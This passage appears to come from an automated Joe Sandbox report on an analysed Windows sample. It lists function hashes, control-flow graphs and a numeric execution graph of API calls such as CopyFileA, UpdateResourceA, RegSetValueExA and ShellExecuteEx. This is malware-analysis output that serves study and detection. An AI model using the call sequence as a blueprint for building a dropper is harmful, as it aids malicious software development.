                                                    • Instruction Fuzzy Hash: E51114B6D002099FCB10CF9AD548BDEFBF4EB88324F14852ED419A7210C3B5AA45CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 215 fc9840-fc9888 216 fc988a-fc988d 215->216 217 fc9890-fc98bb GetModuleHandleW 215->217 216->217 218 fc98bd-fc98c3 217->218 219 fc98c4-fc98d8 217->219 218->219
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00FC98AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 032b0958ed2b7c4058d005472e8aa62d3f2bcd50c5f8a2bec27a8cb6a934d566
                                                    • Instruction ID: 4acb6e7be5c132a3d69c901a434d8748b8e59ccaf0abd42480729516a74c4c0b
                                                    • Opcode Fuzzy Hash: 032b0958ed2b7c4058d005472e8aa62d3f2bcd50c5f8a2bec27a8cb6a934d566
                                                    • Instruction Fuzzy Hash: EC1143B1C002098FDB10CF9AD548BDEFBF4EF88324F14852AD429A7250D3B5A545CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 221 fc9848-fc9888 222 fc988a-fc988d 221->222 223 fc9890-fc98bb GetModuleHandleW 221->223 222->223 224 fc98bd-fc98c3 223->224 225 fc98c4-fc98d8 223->225 224->225
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00FC98AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 80d20d195712cb6174604fc2b3b14e469257803002a896c7d69237cd75557854
                                                    • Instruction ID: 69e9354ad8fe2ecfc472df87487adf0db301de7b24968e9ed791f347276ccc67
                                                    • Opcode Fuzzy Hash: 80d20d195712cb6174604fc2b3b14e469257803002a896c7d69237cd75557854
                                                    • Instruction Fuzzy Hash: A91122B1C002098FDB20CF9AC948BDEFBF4EF89324F14852AD419A7650C3B5A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 227 fcddc4-fcddcb 228 fcff00-fcff6a SetWindowLongW 227->228 229 fcff6c-fcff72 228->229 230 fcff73-fcff87 228->230 229->230
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00FCFEE8,?,?,?,?), ref: 00FCFF5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 47e356d7eff057e7ff9f13da9d281e337155b2ff9d97a8c112d7858745026eaa
                                                    • Instruction ID: 22685403550b228e4823f8e3309758b82db0737e8e417e4830f1fedcb460222d
                                                    • Opcode Fuzzy Hash: 47e356d7eff057e7ff9f13da9d281e337155b2ff9d97a8c112d7858745026eaa
                                                    • Instruction Fuzzy Hash: 9B1136B58002099FDB10CF99D985BDEFBF8EB49324F20851AE955A3300C3B4A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 232 fcfef8-fcff6a SetWindowLongW 233 fcff6c-fcff72 232->233 234 fcff73-fcff87 232->234 233->234
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,00FCFEE8,?,?,?,?), ref: 00FCFF5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 105537769245ff023920603b2a3ad1c9509bf2136b868ff67665caffbe6e7ef4
                                                    • Instruction ID: e082c80f5295ad821f6f64d10b89e65e83c3f53933af08eaac98ee83c0380ef4
                                                    • Opcode Fuzzy Hash: 105537769245ff023920603b2a3ad1c9509bf2136b868ff67665caffbe6e7ef4
                                                    • Instruction Fuzzy Hash: DB1106B58006099FDB10CF99D985BDEFBF4EB48324F14851AD559A3640C374A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 704f761996717b7f63a87cbba5d6d7d04462fb7a9479ec19f73e734077aeed16
                                                    • Instruction ID: cee37b4ea92e37ddc9b7a1f1f4be71a6f38c62ca5c88d575a1fdd0b92e9368f5
                                                    • Opcode Fuzzy Hash: 704f761996717b7f63a87cbba5d6d7d04462fb7a9479ec19f73e734077aeed16
                                                    • Instruction Fuzzy Hash: CF12B8F1C91766CAE710CF65E89C18A3BA1F745328FD14A08E3611BAD1DBB8916BCF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2992445b1933132233043f580b1da0cff7cfa9e54fa977ef65e5817919e5e59
                                                    • Instruction ID: 7051bc77d918b78560ff1dc5452d941fccf70cb81d07ffed83c0acbba410f3ad
                                                    • Opcode Fuzzy Hash: b2992445b1933132233043f580b1da0cff7cfa9e54fa977ef65e5817919e5e59
                                                    • Instruction Fuzzy Hash: 9DA17136E0021A8FCF05DFA5C945ADEB7B2FF85304B15857AE805AB262DB35E905DF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.323543773.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_fc0000_y8kdmHi6x3.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62e261355dbee219cc5b41115a99f991ec1b4b6e3925f6f0a802f0caf13190d7
                                                    • Instruction ID: 8f49bff3b2c66b37c42066d2f19217cb92e210f38d84a8e5c240559fbf50ae4b
                                                    • Opcode Fuzzy Hash: 62e261355dbee219cc5b41115a99f991ec1b4b6e3925f6f0a802f0caf13190d7
                                                    • Instruction Fuzzy Hash: C3C10BF1C51766CAD710DF65E89C18A7BB1FB45328F914A08E2612B6D0DFB8906BCF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage: 5.2%
                                                    Dynamic/Decrypted Code Coverage: 0%
                                                    Signature Coverage: 12.6%
                                                    Total number of Nodes: 1369
                                                    Total number of Limit Nodes: 47
47482b 37634 40500c 12 API calls 37631->37634 37632 4049c0 12 API calls 37633 474877 37632->37633 37638 409628 37633->37638 37635 47483c 37634->37635 37766 404ed8 37635->37766 37637->37632 37639 409638 37638->37639 37640 409659 37639->37640 37785 408c7c 13 API calls 37639->37785 37642 4094ec 37640->37642 37643 4094fc 37642->37643 37644 404ab0 12 API calls 37643->37644 37645 409504 37644->37645 37645->37311 37647 4736c0 37646->37647 37648 404ccc 12 API calls 37647->37648 37649 47372a 37648->37649 37786 432298 37649->37786 37651 473745 37651->37314 37653 4094ec 12 API calls 37652->37653 37654 472f1c 37653->37654 37655 4094ec 12 API calls 37654->37655 37656 472f33 37655->37656 37657 404d40 12 API calls 37656->37657 37658 472f47 37657->37658 37659 472f53 37658->37659 37660 472f62 37658->37660 37661 472f56 37659->37661 37662 472fb0 37659->37662 37663 472f6e 37660->37663 37664 472f7d 37660->37664 37670 473003 37661->37670 37671 472ff9 37661->37671 37674 472f5d 37661->37674 37665 472fc3 37662->37665 37666 472fbc 37662->37666 37667 472f73 37663->37667 37668 472f8e 37663->37668 37669 404a14 12 API calls 37664->37669 37675 404a14 12 API calls 37665->37675 37672 472fd1 37666->37672 37673 472fbe 37666->37673 37667->37674 37678 404a14 12 API calls 37667->37678 37676 404a14 12 API calls 37668->37676 37669->37674 37681 404a14 12 API calls 37670->37681 37679 473011 37671->37679 37680 472ffb 37671->37680 37682 404a14 12 API calls 37672->37682 37673->37674 37687 404a14 12 API calls 37673->37687 37677 4049e4 12 API calls 37674->37677 37675->37674 37676->37674 37683 473053 37677->37683 37678->37674 37686 404a14 12 API calls 37679->37686 37684 47301f 37680->37684 37685 472ffe 37680->37685 37681->37674 37682->37674 37683->37318 37688 404a14 12 API calls 37684->37688 37685->37674 37689 404a14 12 API calls 37685->37689 37686->37674 37687->37674 37688->37674 37689->37674 37691 473139 37690->37691 37692 4732b4 SHGetSpecialFolderLocation SHGetPathFromIDList 37691->37692 37693 47318a 
37691->37693 37709 473266 37692->37709 37694 472ef0 12 API calls 37693->37694 37695 4731a3 37694->37695 37699 4731b5 LoadLibraryA GetProcAddress 37695->37699 37700 4731fe SHGetSpecialFolderLocation SHGetPathFromIDList 37695->37700 37696 4049e4 12 API calls 37697 4732fa 37696->37697 37698 4049c0 12 API calls 37697->37698 37702 473305 37698->37702 37806 408ca8 22 API calls 37699->37806 37704 47322c 37700->37704 37702->37330 37703 4731e6 37807 404b1c 13 API calls 37703->37807 37706 404ccc 12 API calls 37704->37706 37708 47324b 37706->37708 37707 4731f9 37707->37709 37710 409a58 GetFileAttributesA 37708->37710 37709->37696 37711 473256 37710->37711 37712 47325a 37711->37712 37713 473268 37711->37713 37808 404a14 12 API calls 37712->37808 37715 404ccc 12 API calls 37713->37715 37716 47327a 37715->37716 37717 409a58 GetFileAttributesA 37716->37717 37718 473285 37717->37718 37719 473297 37718->37719 37720 473289 37718->37720 37722 4049c0 12 API calls 37719->37722 37809 404a14 12 API calls 37720->37809 37722->37709 37724 404cd0 37723->37724 37731 404c88 37723->37731 37725 404a14 37724->37725 37726 404ce0 37724->37726 37727 404cee 37724->37727 37724->37731 37729 404a84 12 API calls 37725->37729 37734 404a28 37725->37734 37732 404a14 12 API calls 37726->37732 37733 404a84 12 API calls 37727->37733 37728 404a56 37728->37337 37729->37734 37730 404ccb 37730->37337 37731->37725 37731->37730 37735 404c96 37731->37735 37732->37731 37741 404d01 37733->37741 37734->37728 37810 40277c 12 API calls 37734->37810 37736 404cc0 37735->37736 37737 404ca9 37735->37737 37740 40500c 12 API calls 37736->37740 37739 40500c 12 API calls 37737->37739 37743 404cae 37739->37743 37740->37743 37742 404a14 12 API calls 37741->37742 37744 404d2d 37742->37744 37743->37337 37744->37337 37746 409882 37745->37746 37747 4098ae 37745->37747 37811 4096bc 12 API calls 37746->37811 37749 404a14 12 API calls 37747->37749 37755 40989a 37747->37755 37749->37755 37750 409887 37751 40988b 37750->37751 37752 40989c 
37750->37752 37753 404a14 12 API calls 37751->37753 37754 404a14 12 API calls 37752->37754 37753->37755 37756 4098ab 37754->37756 37755->37354 37756->37354 37812 404e80 37757->37812 37760 409a6d 37760->37315 37760->37320 37761->37328 37763 41e0da 37762->37763 37772 41e198 FindResourceA 37763->37772 37765 41e108 37765->37631 37767 404e8c 37766->37767 37768 404ec7 37767->37768 37769 404a84 12 API calls 37767->37769 37768->37637 37770 404ea3 37769->37770 37770->37768 37784 40277c 12 API calls 37770->37784 37773 41e1c4 LoadResource 37772->37773 37774 41e1bd 37772->37774 37776 41e1d7 37773->37776 37777 41e1de SizeofResource LockResource 37773->37777 37782 41e128 13 API calls 37774->37782 37783 41e128 13 API calls 37776->37783 37780 41e1fc 37777->37780 37778 41e1c3 37778->37773 37780->37765 37781 41e1dd 37781->37777 37782->37778 37783->37781 37784->37768 37785->37640 37798 432244 37786->37798 37789 4322b2 37792 404ab0 12 API calls 37789->37792 37790 432301 37791 4049c0 12 API calls 37790->37791 37795 4322f6 37791->37795 37793 4322bd 37792->37793 37801 432378 14 API calls 37793->37801 37795->37651 37796 4322d5 37796->37795 37797 40500c 12 API calls 37796->37797 37797->37795 37802 4321f4 37798->37802 37800 432258 37800->37789 37800->37790 37801->37796 37803 43220d 37802->37803 37804 432221 RegQueryValueExA 37803->37804 37805 432238 37804->37805 37805->37800 37806->37703 37807->37707 37808->37709 37809->37709 37810->37728 37811->37750 37813 404e84 GetFileAttributesA 37812->37813 37813->37760 37815 430f42 37814->37815 37839 430158 37815->37839 37817 430f57 37843 431228 37817->37843 37819 430f6d 37819->37368 37850 49497c 37820->37850 37825 4049c0 12 API calls 37826 494ad3 37825->37826 37827 431494 37826->37827 37837 43149c 37827->37837 37828 4315fc 37829 4049e4 12 API calls 37828->37829 37830 431616 37829->37830 37831 4049c0 12 API calls 37830->37831 37832 43161e 37831->37832 37832->37374 37833 408ff8 12 API calls 37833->37837 37835 404ee0 12 API calls 37835->37837 37836 
40500c 12 API calls 37836->37837 37837->37828 37837->37833 37837->37835 37837->37836 37838 404d40 12 API calls 37837->37838 37876 404f20 12 API calls 37837->37876 37838->37837 37840 43015f 37839->37840 37841 404a14 12 API calls 37840->37841 37842 430177 37841->37842 37842->37817 37844 431235 37843->37844 37846 431290 37843->37846 37845 409a48 4 API calls 37844->37845 37847 43123d 37845->37847 37846->37819 37847->37846 37848 431494 12 API calls 37847->37848 37849 431273 37848->37849 37849->37819 37867 404a58 37850->37867 37853 4049c0 12 API calls 37859 4949aa 37853->37859 37854 4949ef 37855 4049e4 12 API calls 37854->37855 37857 494a09 37855->37857 37862 494a18 37857->37862 37859->37854 37871 404ee0 12 API calls 37859->37871 37872 494848 12 API calls 37859->37872 37873 404a14 12 API calls 37859->37873 37874 404f20 12 API calls 37859->37874 37863 404a14 12 API calls 37862->37863 37864 494a30 37863->37864 37865 494a83 37864->37865 37866 404ed8 12 API calls 37864->37866 37865->37825 37866->37864 37869 404a5c 37867->37869 37868 404a80 37868->37853 37869->37868 37875 40277c 12 API calls 37869->37875 37871->37859 37872->37859 37873->37859 37874->37859 37875->37868 37876->37837 37878 404e80 37877->37878 37879 409f60 CreateDirectoryA 37878->37879 37879->37484 37881 473824 37880->37881 37882 409a48 4 API calls 37881->37882 37883 473842 37882->37883 37884 473865 37883->37884 37886 409a90 2 API calls 37883->37886 37885 47387a CopyFileA 37884->37885 37887 47388a 37885->37887 37886->37884 37888 409a90 2 API calls 37887->37888 37889 473894 37888->37889 37890 4049e4 12 API calls 37889->37890 37891 4738ae 37890->37891 37891->37485 37893 474b1a 37892->37893 37950 409a7c 37893->37950 37895 474b38 37896 409a90 2 API calls 37895->37896 37897 474b48 37896->37897 37898 474b52 BeginUpdateResourceA 37897->37898 37899 474b66 37898->37899 37900 474bd9 37898->37900 37902 40275c 12 API calls 37899->37902 37901 409a90 2 API calls 37900->37901 37903 474be4 37901->37903 37904 474b7d 37902->37904 
37905 4049e4 12 API calls 37903->37905 37907 474b8f UpdateResourceA EndUpdateResourceA 37904->37907 37906 474bfe 37905->37906 37906->37505 37908 474bad 37907->37908 37953 40277c 12 API calls 37908->37953 37910 474bd1 37910->37505 37912 474964 37911->37912 37913 4049c0 12 API calls 37912->37913 37914 474981 37913->37914 37915 404ed8 12 API calls 37914->37915 37916 474994 73E714E0 37915->37916 37917 4749a7 37916->37917 37918 474a90 37916->37918 37920 40275c 12 API calls 37917->37920 37919 4049c0 12 API calls 37918->37919 37922 474aa5 37919->37922 37921 4749af 37920->37921 37923 404ed8 12 API calls 37921->37923 37924 4049e4 12 API calls 37922->37924 37925 4749d4 73E714C0 37923->37925 37926 474ab2 37924->37926 37927 4749e2 73E71500 37925->37927 37928 474a66 37925->37928 37926->37507 37930 4749fc 37927->37930 37931 474a48 37927->37931 37957 40277c 12 API calls 37928->37957 37954 40a664 37930->37954 37933 404ed8 12 API calls 37931->37933 37932 474a88 37932->37507 37934 474a58 73E71500 37933->37934 37934->37928 37937 404a58 12 API calls 37937->37931 37939 473593 37938->37939 37940 473612 37939->37940 37941 473602 37939->37941 37977 4321d4 RegDeleteValueA 37940->37977 37973 43226c 37941->37973 37944 473610 37944->37521 37946 404e80 37945->37946 37947 409aa1 SetFileAttributesA 37946->37947 37948 409ab2 37947->37948 37949 409aab GetLastError 37947->37949 37948->37490 37949->37948 37951 404e80 37950->37951 37952 409a86 GetFileAttributesA 37951->37952 37952->37895 37953->37910 37958 40a678 37954->37958 37957->37932 37959 40a69c 37958->37959 37960 40a6c7 37959->37960 37971 40a26c 13 API calls 37959->37971 37962 40a71f 37960->37962 37968 40a6dc 37960->37968 37963 404ab0 12 API calls 37962->37963 37964 40a673 37963->37964 37964->37937 37965 40a715 37966 40500c 12 API calls 37965->37966 37966->37964 37967 4049c0 12 API calls 37967->37968 37968->37965 37968->37967 37969 40500c 12 API calls 37968->37969 37972 40a26c 13 API calls 37968->37972 37969->37968 37971->37960 37972->37968 
37974 43227c 37973->37974 37978 432310 37974->37978 37976 432292 37976->37944 37977->37944 37979 432328 37978->37979 37980 43233c RegSetValueExA 37979->37980 37981 43234a 37980->37981 37982 432369 37980->37982 37984 40d23c 13 API calls 37981->37984 37982->37976 37984->37982 37987 4734a7 37985->37987 37986 473507 ShellExecuteEx 37988 473542 37986->37988 37989 47351b 37986->37989 37987->37986 37990 4049e4 12 API calls 37988->37990 37989->37988 37991 473530 WaitForSingleObject 37989->37991 37992 473563 37990->37992 37991->37988 37993 473529 Sleep 37991->37993 37992->37539 37992->37540 37993->37991 37994->37541 37995->37541 37996->37541 37998 404e80 37997->37998 37999 4099fa FindFirstFileA 37998->37999 38000 409a05 FindClose 37999->38000 38001 409a39 37999->38001 38000->38001 38002 409a14 FileTimeToLocalFileTime FileTimeToDosDateTime 38000->38002 38001->37222 38002->38001 38003->37567 38004 49ab80 38015 406d28 GetModuleHandleA 38004->38015 38006 49ab90 38019 45a28c 38006->38019 38010 49abc5 38034 45a714 63 API calls 38010->38034 38012 49abd1 38035 40484c 38012->38035 38016 406d5b 38015->38016 38047 404684 38016->38047 38020 45a2ae 38019->38020 38021 45a2eb 38019->38021 38254 45a240 38020->38254 38022 404a14 12 API calls 38021->38022 38029 45a2e9 38022->38029 38024 4049c0 12 API calls 38025 45a30d 38024->38025 38030 45a694 38025->38030 38026 45a2b8 38027 45a2d4 SetWindowTextA 38026->38027 38026->38029 38028 4049c0 12 API calls 38027->38028 38028->38029 38029->38024 38031 45a6a7 38030->38031 38260 452e3c 38031->38260 38032 45a6c8 38032->38010 38034->38012 38039 404865 38035->38039 38036 404884 38392 4047c0 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38036->38392 38037 404895 38388 4045c4 38037->38388 38039->38036 38039->38037 38041 40488e 38041->38037 38042 4048aa 38043 4048d0 FreeLibrary 38042->38043 38046 4048d6 38042->38046 38043->38046 38044 40490b 38045 404903 ExitProcess 38046->38044 38046->38045 38048 4046b7 38047->38048 38051 404624 38048->38051 
38052 404660 38051->38052 38053 404633 38051->38053 38052->38006 38053->38052 38056 446564 38053->38056 38070 405f94 38053->38070 38057 4465dc 38056->38057 38058 44657e GetVersion 38056->38058 38057->38053 38074 446330 GetCurrentProcessId 38058->38074 38062 4465a2 38102 41a548 RtlLeaveCriticalSection 38062->38102 38064 4465ac 38103 41a4f4 RtlLeaveCriticalSection 38064->38103 38066 4465bc 38104 41a4f4 RtlLeaveCriticalSection 38066->38104 38068 4465cc 38105 41a4f4 RtlLeaveCriticalSection 38068->38105 38071 405fa4 GetModuleFileNameA 38070->38071 38072 405fc0 38070->38072 38235 4061d0 GetModuleFileNameA RegOpenKeyExA 38071->38235 38072->38053 38075 40a664 13 API calls 38074->38075 38076 44636c 38075->38076 38077 404a14 12 API calls 38076->38077 38078 446379 38077->38078 38079 446383 GlobalAddAtomA GetCurrentThreadId 38078->38079 38080 40a664 13 API calls 38079->38080 38081 4463bd 38080->38081 38082 404a14 12 API calls 38081->38082 38083 4463ca 38082->38083 38084 4463d4 GlobalAddAtomA 38083->38084 38085 404e80 38084->38085 38086 4463ea RegisterClipboardFormatA 38085->38086 38106 41af14 38086->38106 38088 446401 38110 457fc8 38088->38110 38090 44642a 38125 4590ac 38090->38125 38092 446440 38137 41a634 15 API calls 38092->38137 38094 44646a GetModuleHandleA 38095 44648a 38094->38095 38096 44647a GetProcAddress 38094->38096 38097 4049c0 12 API calls 38095->38097 38096->38095 38098 44649f 38097->38098 38099 4049c0 12 API calls 38098->38099 38100 4464a7 38099->38100 38101 41a4a8 14 API calls 38100->38101 38101->38062 38102->38064 38103->38066 38104->38068 38105->38057 38107 41af1a 38106->38107 38108 41af2f RtlInitializeCriticalSection 38107->38108 38109 41af44 38108->38109 38109->38088 38111 457fd2 38110->38111 38138 458384 LoadCursorA 38111->38138 38114 458021 38115 45805d GetDC GetDeviceCaps ReleaseDC 38114->38115 38116 458093 38115->38116 38143 424c3c 38116->38143 38118 45809f 38119 424c3c 14 API calls 38118->38119 38120 4580b1 38119->38120 38121 424c3c 14 API calls 
38120->38121 38122 4580c3 38121->38122 38147 4587a4 38122->38147 38124 4580d0 38124->38090 38126 4590bb 38125->38126 38127 45917c LoadIconA 38126->38127 38186 42b7c8 38127->38186 38129 45919f GetModuleFileNameA OemToCharA 38130 4591e8 38129->38130 38131 45920e CharLowerA 38130->38131 38132 459231 38131->38132 38133 459242 38132->38133 38188 4593b4 38132->38188 38212 45b188 12 API calls 38133->38212 38136 459264 38136->38092 38137->38094 38139 4583a3 38138->38139 38140 4583bc LoadCursorA 38139->38140 38142 45800b GetKeyboardLayout 38139->38142 38165 45843c 38140->38165 38142->38114 38144 424c42 38143->38144 38168 424180 38144->38168 38146 424c64 38146->38118 38149 4587bd 38147->38149 38148 4587ee SystemParametersInfoA 38150 458801 CreateFontIndirectA 38148->38150 38151 458819 GetStockObject 38148->38151 38149->38148 38178 424fcc 38150->38178 38153 424fcc 17 API calls 38151->38153 38155 45882d SystemParametersInfoA 38153->38155 38156 458881 38155->38156 38157 45884d CreateFontIndirectA 38155->38157 38183 4250b0 17 API calls 38156->38183 38158 424fcc 17 API calls 38157->38158 38160 458866 CreateFontIndirectA 38158->38160 38163 424fcc 17 API calls 38160->38163 38161 458891 GetStockObject 38162 424fcc 17 API calls 38161->38162 38164 45887f 38162->38164 38163->38164 38164->38124 38166 40275c 12 API calls 38165->38166 38167 45844f 38166->38167 38167->38139 38169 42419b 38168->38169 38176 424168 RtlEnterCriticalSection 38169->38176 38171 4241a5 38172 40275c 12 API calls 38171->38172 38175 424202 38171->38175 38172->38175 38174 424253 38174->38146 38177 424174 RtlLeaveCriticalSection 38175->38177 38176->38171 38177->38174 38184 424b88 GetObjectA 38178->38184 38180 424fde 38185 424dc0 16 API calls 38180->38185 38182 424fe7 38182->38155 38183->38161 38184->38180 38185->38182 38187 42b7d4 38186->38187 38187->38129 38189 4593dd 38188->38189 38190 45953f 38188->38190 38189->38190 38213 422bcc 38189->38213 38191 4049c0 12 API calls 38190->38191 38193 459554 38191->38193 
38193->38133 38194 4593f6 GetClassInfoA 38195 45941c RegisterClassA 38194->38195 38200 459451 38194->38200 38196 459435 38195->38196 38195->38200 38225 406a70 13 API calls 38196->38225 38198 459442 38226 40d144 12 API calls 38198->38226 38216 407ae4 38200->38216 38202 4594a8 38203 4049c0 12 API calls 38202->38203 38204 4594b6 SetWindowLongA 38203->38204 38205 4594d6 38204->38205 38206 459501 GetSystemMenu DeleteMenu DeleteMenu 38204->38206 38220 45a038 38205->38220 38206->38190 38207 459532 DeleteMenu 38206->38207 38207->38190 38210 45a038 19 API calls 38211 4594f5 SetClassLongA 38210->38211 38211->38206 38212->38136 38214 422bdc VirtualAlloc 38213->38214 38215 422c0a 38213->38215 38214->38215 38215->38194 38227 402c0c 38216->38227 38218 407af7 CreateWindowExA 38219 407b2f 38218->38219 38219->38202 38228 42b534 38220->38228 38223 45a047 LoadIconA 38224 4594dd SendMessageA 38223->38224 38224->38210 38225->38198 38226->38200 38227->38218 38231 42b570 38228->38231 38230 42b53e 38230->38223 38230->38224 38232 42b580 38231->38232 38233 42b5ac 38231->38233 38232->38233 38234 426aa0 18 API calls 38232->38234 38233->38230 38234->38233 38236 406253 38235->38236 38237 406213 RegOpenKeyExA 38235->38237 38253 406018 12 API calls 38236->38253 38237->38236 38238 406231 RegOpenKeyExA 38237->38238 38238->38236 38240 4062dc lstrcpyn GetThreadLocale GetLocaleInfoA 38238->38240 38242 406313 38240->38242 38243 4063f6 38240->38243 38241 406278 RegQueryValueExA 38244 406298 RegQueryValueExA 38241->38244 38245 4062b6 RegCloseKey 38241->38245 38242->38243 38246 406323 lstrlen 38242->38246 38243->38072 38244->38245 38245->38072 38248 40633b 38246->38248 38248->38243 38249 406360 lstrcpyn LoadLibraryExA 38248->38249 38250 406388 38248->38250 38249->38250 38250->38243 38251 406392 lstrcpyn LoadLibraryExA 38250->38251 38251->38243 38252 4063c4 lstrcpyn LoadLibraryExA 38251->38252 38252->38243 38253->38241 38255 45a275 38254->38255 38256 45a255 GetWindowTextA 38254->38256 38258 404a14 12 API 
calls 38255->38258 38257 404ab0 12 API calls 38256->38257 38259 45a273 38257->38259 38258->38259 38259->38026 38261 452e52 38260->38261 38262 452f66 38261->38262 38269 41aa2c 38261->38269 38262->38032 38264 452f2b 38264->38032 38265 452ee2 38265->38264 38279 406a70 13 API calls 38265->38279 38267 452f19 38280 40d180 13 API calls 38267->38280 38270 41aa42 38269->38270 38271 41aa77 38270->38271 38289 41a8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 38270->38289 38281 41a984 38271->38281 38276 41aaa2 38277 41aaba 38276->38277 38291 41a928 13 API calls 38276->38291 38277->38265 38279->38267 38280->38264 38284 41a9ae 38281->38284 38288 41aa02 38281->38288 38282 4049c0 12 API calls 38283 41aa19 38282->38283 38283->38276 38290 41a8f8 13 API calls 38283->38290 38285 41a984 20 API calls 38284->38285 38284->38288 38286 41a9c6 38285->38286 38292 41a81c 38286->38292 38288->38282 38289->38271 38290->38276 38291->38277 38293 41a82d 38292->38293 38294 41a83c FindResourceA 38293->38294 38295 41a899 38294->38295 38296 41a84c 38294->38296 38295->38288 38297 41e0d0 17 API calls 38296->38297 38298 41a85d 38297->38298 38301 41da30 38298->38301 38300 41a878 38300->38288 38306 41e254 38301->38306 38303 41da4c 38310 420288 38303->38310 38305 41da67 38305->38300 38307 41e25e 38306->38307 38308 40275c 12 API calls 38307->38308 38309 41e277 38308->38309 38309->38303 38338 420670 38310->38338 38313 420300 38367 420694 13 API calls 38313->38367 38314 420335 38370 420694 13 API calls 38314->38370 38317 42030b 38368 41a398 14 API calls 38317->38368 38318 420346 38320 42034f 38318->38320 38321 42035c 38318->38321 38371 420694 13 API calls 38320->38371 38372 420694 13 API calls 38321->38372 38324 420377 38373 420228 13 API calls 38324->38373 38326 420313 38369 420694 13 API calls 38326->38369 38328 420328 38343 41a0e8 38328->38343 38332 4203d0 38334 420460 38332->38334 38359 425d3c 38332->38359 38363 425a84 38332->38363 38333 4204a0 38333->38305 38334->38333 38374 41ac6c 38334->38374 38378 
41ee34 38338->38378 38341 4202c1 38341->38313 38341->38314 38347 41a0f5 38343->38347 38344 41a1cf 38384 41a08c RtlLeaveCriticalSection 38344->38384 38345 41ac6c 13 API calls 38345->38347 38347->38345 38350 41a18e 38347->38350 38348 41a1e6 38351 406cdc 38348->38351 38349 41ac6c 13 API calls 38349->38350 38350->38344 38350->38349 38352 406d11 TlsGetValue 38351->38352 38353 406ceb 38351->38353 38354 406cf6 38352->38354 38355 406d1b 38352->38355 38353->38332 38385 406c98 LocalAlloc TlsSetValue 38354->38385 38355->38332 38357 406cfb TlsGetValue 38358 406d0a 38357->38358 38358->38332 38360 425d55 38359->38360 38362 425d79 38359->38362 38360->38362 38386 40d200 13 API calls 38360->38386 38362->38334 38364 425d3c 13 API calls 38363->38364 38365 425a9a 38364->38365 38366 425ab3 GetTextExtentPoint32A 38365->38366 38366->38334 38367->38317 38368->38326 38369->38328 38370->38318 38371->38328 38372->38324 38373->38328 38375 41ac76 38374->38375 38376 41ac8a 38375->38376 38387 41abf8 13 API calls 38375->38387 38376->38334 38381 41ee3f 38378->38381 38379 41ee79 38379->38341 38382 41e8f4 13 API calls 38379->38382 38381->38379 38383 41ee80 13 API calls 38381->38383 38382->38341 38383->38381 38384->38348 38385->38357 38386->38362 38387->38376 38389 4045d6 38388->38389 38390 404600 